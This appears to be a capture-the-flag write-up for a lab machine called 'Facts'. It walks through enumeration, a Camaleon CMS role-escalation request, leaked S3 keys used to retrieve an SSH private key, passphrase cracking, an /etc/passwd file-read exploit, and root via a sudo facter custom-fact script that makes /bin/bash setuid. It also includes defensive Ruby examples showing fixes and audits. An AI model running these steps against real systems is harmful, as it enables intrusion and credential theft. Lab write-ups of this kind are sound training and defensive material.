Facts

External Enumeration

Nmap

nmap -sC -sV -T4 -p- facts.htb

22/tcp    open  ssh     OpenSSH 9.9p1 Ubuntu 3ubuntu3.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 4d:d7:b2:8c:d4:df:57:9c:a4:2f:df:c6:e3:01:29:89 (ECDSA)
|_  256 a3:ad:6b:2f:4a:bf:6f:48:ac:81:b9:45:3f:de:fb:87 (ED25519)
80/tcp    open  http    nginx 1.26.3 (Ubuntu)
|_http-server-header: nginx/1.26.3 (Ubuntu)
|_http-title: facts
54321/tcp open  unknown

sudo nmap -A -sU --top-ports 100 facts.htb
68/udp open|filtered dhcpc

Vhosts - No Results

ffuf -w /opt/useful/seclists/Discovery/DNS/subdomains-top1million-20000.txt -u http://10.129.221.197 -H 'Host: FUZZ.facts.htb'

Directory

ffuf -u http://facts.htb/FUZZ -w /opt/useful/seclists/Discovery/Web-Content/raft-medium-words-lowercase.txt -fc 403,404

admin                 [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 405ms]

SSH (22) - No Anonymous Access

ssh anonymous@facts.htb

HTTP (80)

  • Able to find login page on http://facts.htb/admin
  • Create account and login
  • Shows version Camaleon CMS Version 2.9.0
  • Searching for CVE https://www.tenable.com/security/research/tra-2025-09
def updated_ajax
  @user = current_site.users.find(params[:user_id])
  update_session = current_user_is?(@user)

  @user.update(params.require(:password).permit!)
  render inline: @user.errors.full_messages.join(', ')

  # keep user logged in when changing their own password
  update_auth_token_in_cookie @user.auth_token if update_session && @user.saved_change_to_password_digest?
end
  • When updating the user password, you can update the role as well
  • append to password update request
&password%5Brole%5D=admin
  • Logging back in as user2:admin we are now an administrator
  • Checking user comments, there may be users bob, carol, dave
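The `permit!` in `updated_ajax` is the whole bug: every key under `password[...]` is passed straight to `update`, so a caller who appends `password[role]=admin` to their own password change rewrites their role. The Ruby below is an added example, not Camaleon CMS code; `Params` is a deliberately minimal stand-in for Rails strong parameters, `User` is a stand-in model, and the `client` starting role and the request hash are constructed. It runs the vulnerable call and the hardened allow-list side by side.

```ruby
# Added example (not Camaleon CMS code): a minimal stand-in for Rails strong
# parameters, used to show why `permit!` lets a caller change their own role
# and what an explicit allow-list does instead.
class Params
  def initialize(hash)
    @hash = hash
  end

  # Like Rails' require: returns the nested params under the given key.
  def require(key)
    value = @hash[key]
    raise ArgumentError, "param is missing: #{key}" if value.nil? || value.empty?
    Params.new(value)
  end

  # permit! marks everything as allowed: the whole hash flows into update.
  def permit!
    @hash.dup
  end

  # permit(*keys) keeps only the allow-listed keys; anything else is dropped.
  def permit(*keys)
    keys = keys.map(&:to_s)
    @hash.select { |k, _| keys.include?(k.to_s) }
  end
end

# Stand-in for an ActiveRecord model with a mass-assignable update.
class User
  attr_reader :attributes

  def initialize(attrs)
    @attributes = attrs
  end

  def update(attrs)
    @attributes = @attributes.merge(attrs)
  end
end

# Constructed request body, as the server sees it after form decoding:
# password[password]=admin&password[password_confirmation]=admin&password[role]=admin
TAMPERED_REQUEST = {
  "user_id" => "2",
  "password" => {
    "password" => "admin",
    "password_confirmation" => "admin",
    "role" => "admin" # extra key appended to the password update
  }
}.freeze

# Vulnerable: mirrors `@user.update(params.require(:password).permit!)`.
def vulnerable_update(request)
  user = User.new("role" => "client")
  user.update(Params.new(request).require("password").permit!)
  user.attributes
end

# Hardened: explicit allow-list. `role` is silently discarded, so a role can
# only change through a separate, authorised admin action.
def hardened_update(request)
  user = User.new("role" => "client")
  user.update(Params.new(request).require("password").permit("password", "password_confirmation"))
  user.attributes
end

puts "vulnerable role: #{vulnerable_update(TAMPERED_REQUEST)['role']}" # admin
puts "hardened role:   #{hardened_update(TAMPERED_REQUEST)['role']}"   # client
```

The allow-list is the fix; a server-side check that only admins may touch `role` is the second layer, and a log entry whenever a role attribute changes outside the admin UI is the detection hook.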

Enumerating as user2 admin

  • General Site → Filesystem Settings → Found S3 Credentials
Aws s3 access key (*) - AKIA03BA7211D1651F7A
Aws s3 secret key (*) - 8poFcD90w24gUrJBYo95Rcy5dzF3FQtjeBJG0dAQ
Aws s3 bucket name (*) - randomfacts
Aws s3 region (*) - us-east-1
Aws s3 bucket endpoint - http://localhost:54321
Cloudfront url - http://facts.htb/randomfacts
  • Setup S3 Profile
aws configure --profile htb
  • Test connection / List files
aws s3 ls s3://randomfacts --endpoint-url http://10.129.221.197:54321 --profile htb
                           PRE thumb/
2025-09-11 08:07:06     446847 animalejected.png
2025-09-11 08:07:06     271210 annefrankasteroid.png
2025-09-11 08:07:06     255778 catsattachment.png
2025-09-11 08:07:05     411597 cuteanimals.png
2025-09-11 08:07:05     177331 darkchocolate.png
2025-09-11 08:07:05     312753 dogscatssmell.png
2025-09-11 08:07:04     922561 dolphinfact.png
2025-09-11 08:07:04      67352 finlandhappiest.png
2025-09-11 08:07:04     388178 firstimpressions.png
2025-09-11 08:07:04     100689 firsttransaction.png
2025-09-11 08:07:03     222436 firstwebcam.png
2025-09-11 08:07:03     128158 georgewashingtonslaves.png
2025-09-11 08:07:03      34816 logopage.png
2025-09-11 08:07:03      16886 logopage2.png
2025-09-11 08:07:02      80796 pressureupbeat.png
2025-09-11 08:07:02      24792 primary-question-mark.png
2025-09-11 08:07:02     341284 smallanimals.png
2025-09-11 08:07:02     332397 superiorpeople.png
2025-09-11 08:07:01      39579 vanilla.png
2025-09-11 08:07:01      35769 youtubewatchhours.png
  • Download all files from S3, Nothing important
aws s3 sync s3://randomfacts ./bucket_dump --endpoint-url http://10.129.221.197:54321 --profile htb
  • Check for other S3 Buckets
  • Internal sounds important
aws s3 ls --endpoint-url http://10.129.221.197:54321 --profile htb
2025-09-11 08:06:52 internal
2025-09-11 08:06:52 randomfacts
  • Listing all files in Internal
  • Found SSH Keys
  • Download Files
aws s3 ls s3://internal --recursive --endpoint-url http://10.129.221.197:54321 --profile htb

aws s3 sync s3://internal ./internal --endpoint-url http://10.129.221.197:54321 --profile htb

2026-01-31 16:14:28         82 .ssh/authorized_keys
2026-01-31 16:14:28        464 .ssh/id_ed25519
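The `internal` bucket is reachable with the same key the CMS stores for serving images, and it holds an SSH private key and an `authorized_keys` file. As an added example (not part of the page's tooling), the Ruby below parses `aws s3 ls --recursive` style output and flags object keys that should never be in a bucket an application credential can reach. The listing is constructed from the entries shown above plus one extra `.env` line; the patterns are assumptions about what counts as sensitive.

```ruby
# Added example (not from the page): parse `aws s3 ls --recursive` output and
# flag objects that are secrets or grant access when leaked. Input is
# constructed from the listings above; the PRE line is a common-prefix entry.
LISTING = <<~TXT
                             PRE thumb/
  2025-09-11 08:07:06     446847 animalejected.png
  2025-09-11 08:07:03      34816 logopage.png
  2026-01-31 16:14:28         82 .ssh/authorized_keys
  2026-01-31 16:14:28        464 .ssh/id_ed25519
  2026-01-31 16:14:28       1200 config/.env
TXT

S3Object = Struct.new(:modified, :size, :key)

# date time size key
LINE_RE = /\A(\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})\s+(\d+)\s+(.+)\z/

# Returns S3Object entries; "PRE" lines describe folders, not objects.
def parse_listing(text)
  text.each_line.map(&:strip).reject(&:empty?).filter_map do |line|
    next if line.start_with?("PRE ")
    m = LINE_RE.match(line) or next
    S3Object.new(m[1], m[2].to_i, m[3])
  end
end

# Assumed patterns for material that must not sit beside public web assets.
SENSITIVE = {
  "ssh private key" => %r{(^|/)id_(rsa|dsa|ecdsa|ed25519)$},
  "ssh authorized_keys" => %r{(^|/)authorized_keys$},
  "dotenv / config secrets" => %r{(^|/)\.env($|\.)},
  "database dump" => /\.(sql|dump|bak)$/i
}.freeze

# Returns [key, reason] pairs for every flagged object.
def flag_sensitive(objects)
  objects.filter_map do |obj|
    reason = SENSITIVE.find { |_, re| re.match?(obj.key) }&.first
    [obj.key, reason] if reason
  end
end

flag_sensitive(parse_listing(LISTING)).each do |key, reason|
  puts "#{key}: #{reason}"
end
```

The mitigation is on the credential side: the key the CMS holds should be scoped to the `randomfacts` bucket only, so a leaked CMS setting cannot even list `internal`.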
  • Crack SSH key passphrase (hash extracted with ssh2john)
ssh2john id_ed25519 > ssh_hash.txt
john ssh_hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

dragonballz

Finding Username

https://github.com/Goultarde/CVE-2024-46987/blob/main/CVE-2024-46987.py
python3 CVE-2024-46987.py -u http://facts.htb --user user2 -p admin /etc/passwd |tail

syslog:x:104:104::/nonexistent:/usr/sbin/nologin
uuidd:x:105:105::/run/uuidd:/usr/sbin/nologin
tcpdump:x:106:107::/nonexistent:/usr/sbin/nologin
tss:x:107:108:TPM software stack,,,:/var/lib/tpm:/bin/false
landscape:x:108:109::/var/lib/landscape:/usr/sbin/nologin
fwupd-refresh:x:989:989:Firmware update daemon:/var/lib/fwupd:/usr/sbin/nologin
sshd:x:109:65534::/run/sshd:/usr/sbin/nologin
trivia:x:1000:1000:facts.htb:/home/trivia:/bin/bash
william:x:1001:1001::/home/william:/bin/bash
_laurel:x:101:988::/var/log/laurel:/bin/false

Shell as trivia on facts.htb

ssh -i id_ed25519 trivia@facts.htb

trivia@facts:/home/william$ cat user.txt
d6dde563fba1de8d271dadd0ea66bf84
  • User has sudo permissions over facter
sudo -l
User trivia may run the following commands on facts:
    (ALL) NOPASSWD: /usr/bin/facter

Exploit Facter

  • Facter supports loading custom scripts from user-defined directories
cd /tmp
mkdir exploit_facts
cd exploit_facts
cat > exploit.rb << 'EOF'
#!/usr/bin/env ruby
puts "custom_fact=exploited"
system("chmod +s /bin/bash")
EOF
  • run sudo with facter script
sudo /usr/bin/facter --custom-dir=/tmp/exploit_facts/ x
trivia@facts:/tmp/exploit_facts$ ls -al /bin/bash
-rwsr-sr-x 1 root root 1740896 Mar  5  2025 /bin/bash
bash-5.2# cat root.txt
bbce0238939b7649f3b685d0c15b1881
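The root path depends on one sudoers line: `facter` may be run as root with any arguments, and `--custom-dir` makes it load Ruby from a directory the invoker chooses. As an added example (not from the page), the Ruby below parses sudoers-style rules and flags unrestricted rules on binaries that execute caller-supplied code. The rule set and the `CODE_LOADERS` table are constructed for the demonstration; the `""` argument form is sudoers syntax for "no arguments allowed".

```ruby
# Added example (not from the page): audit sudoers-style rules for NOPASSWD
# or unrestricted rules on binaries that load code from caller-named paths.
# facter is listed because --custom-dir executes Ruby from any directory.
# The rules below are constructed; only the trivia line mirrors the page.
RULES = <<~SUDOERS
  root    ALL=(ALL:ALL) ALL
  trivia  ALL=(ALL) NOPASSWD: /usr/bin/facter
  deploy  ALL=(root) NOPASSWD: /usr/bin/systemctl restart nginx
  ops     ALL=(ALL) /usr/bin/facter ""
SUDOERS

# Assumed table: binaries that evaluate code from paths given on the command line.
CODE_LOADERS = {
  "/usr/bin/facter" => "loads Ruby custom facts from --custom-dir",
  "/usr/bin/puppet" => "applies manifests from any path given"
}.freeze

Rule = Struct.new(:user, :runas, :nopasswd, :command, :args)

# user  host=(runas) [NOPASSWD:] command [args]
RULE_RE = /\A(\S+)\s+\S+=\((.*?)\)\s+(NOPASSWD:\s*)?(\S+)(?:\s+(.*))?\z/

def parse_rules(text)
  text.each_line.map(&:strip).reject { |l| l.empty? || l.start_with?("#") }.filter_map do |line|
    m = RULE_RE.match(line) or next
    Rule.new(m[1], m[2], !m[3].nil?, m[4], m[5].to_s.strip)
  end
end

# A rule is risky when the command is a known code loader and its arguments
# are not pinned: an empty args field means the invoker may pass anything,
# while `""` or an explicit argument string is taken as pinned.
def risky_rules(rules)
  rules.select { |r| CODE_LOADERS.key?(r.command) && r.args.empty? }
end

def report(rules)
  risky_rules(rules).map do |r|
    "#{r.user}: #{r.command} runs as #{r.runas}" \
      "#{r.nopasswd ? ' without a password' : ''}; #{CODE_LOADERS[r.command]}; " \
      "pin the arguments (e.g. #{r.command} \"\") or remove the rule"
  end
end

puts report(parse_rules(RULES))
```

On the detection side, a sudo log line for `facter` carrying `--custom-dir=` pointing under `/tmp` or a home directory is the event worth alerting on, since an administrator's own fact directories live under system paths.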